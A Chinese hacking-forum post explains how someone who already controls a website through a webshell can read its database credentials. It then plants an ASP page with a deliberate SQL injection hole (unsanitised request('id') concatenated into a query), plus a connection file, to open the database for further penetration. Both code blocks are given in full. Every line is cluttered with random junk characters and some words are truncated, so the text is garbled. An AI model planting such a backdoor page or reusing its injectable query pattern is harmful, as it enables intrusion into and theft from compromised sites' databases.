自己构造注入点方便入侵6 u+ a* {- c7 v/ I# ^( M! L
# J" d* R5 e+ q! H0 s6 ] i
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息4 _% ~1 } {$ @) [. D1 J
& ?( t; i5 ]9 Z! T这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
. u; v. s1 G8 `( J- E6 G) }/ c8 ^+ |- S( k. N) v7 D9 L
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
* x0 ]8 k4 @( d$ y: i3 _' F/ w
# d/ [% ^4 h6 [1 l/ ]密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
7 F7 J3 U B9 ?" o0 r8 k
8 `% o! y, e H因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
9 y+ H7 Y8 D$ J) c0 n0 c K% }* M, Q7 ~; \/ A" l0 g
程序代码" A7 S' v' B: d" l
<!--#include file="xx.asp"-->5 f0 o6 u7 c! b c) Q: }0 B c; q- y
<%
8 Y, f/ d) i, K9 @set rs=server.createobject("ADODB.recordset")3 \5 X. P; D$ z! Z7 B
id = request("id")
3 S- E! }: a) o0 k% _, |% PstrSQL = "select * from admin where id=" & id
1 t. q0 T. u8 C6 ^% Z6 Prs.open strSQL,conn,1,39 r6 m( V c' B" G8 O& h8 }
rs.close
4 M. P# _6 ]) l" R%>
4 b+ t# T1 Y3 c6 {$ W
6 |) G. l7 F( n' a把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在( c" L; ~4 D4 q
" s4 Y9 n# K0 ]* B你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!) U; @8 w* x6 Z Q1 n% x' E1 }. k
3 v& B% c* D: m然后就要构造一个连接数据库的文件了,代码如下:( Y% ~7 Y2 D' Y4 f: h: U, o2 `
程序代码" \: ?) z- y. o( Q7 t( ]
<%
9 \( R1 v8 ~; h, A) i: j* bstrSQLServerName = "000.000.000.000" '服务器名称或地址
9 n; j9 X2 E* xstrSQLDBUserName = "sqlname" '数据库帐号" F5 k( y! u( Q
strSQLDBPassword = "sqlpass" '数据库密码
3 w8 f; n) Y& j! j% z) RstrSQLDBName = "sqldataname" '数据库名称
( q# F0 b U, D' b% m0 J7 KSet conn = Server.CreateObject("ADODB.Connection")! z* t' j G" v9 u- _; C- c/ I
strCon = " rovider=SQLOLEDB.1 ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & " assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"3 C$ @5 M; v6 P9 j
conn.open strCon
" r% A2 W! t' q$ E%>: _& Q( d6 v: f! T6 [: e/ P$ b
, a' m* R* e8 k# R6 }这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,- Y9 N" S0 ?* D9 J
9 b. s! g& g4 h% B- c就这样,正常情况下,就OK了,伪造成功……" f5 ^2 m1 h, H) G
) l7 {# ]/ A( c5 ?1 a, j1 U% O 如果有什么问题可以提出来大家一起探讨解决。 |